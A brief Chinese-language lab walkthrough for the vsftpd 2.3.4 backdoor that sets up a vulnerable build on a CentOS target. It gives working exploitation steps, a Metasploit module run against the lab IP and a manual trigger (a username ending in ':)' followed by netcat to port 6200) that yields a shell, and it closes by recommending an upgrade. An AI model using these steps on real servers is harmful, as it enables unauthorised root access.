环境搭建

压缩包需要下载特定版本,官方提供的安装包没有这个漏洞

1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录

tar -zxvf 压缩包名称

2.进入vsftpd目录,赋予文件权限,之后进行make &&make install

1
2
3
cd /vsftpd-2.3.4
chmod 777 *
make &&make install

漏洞利用

code:1

使用msf利用

1
2
3
use exploit/unix/ftp/vsftpd_234_backdoor 
set RhoSTS 192.168.142.145
exploit

code:2

手动利用

打开命令行登录ftp服务器,在用户名处输入root:)然后随意输入一个密码回车等待,

image-20230916095254559

输入nc 目标ip 6200 即可连接

image-20230916095306663

修复建议

升级新的版本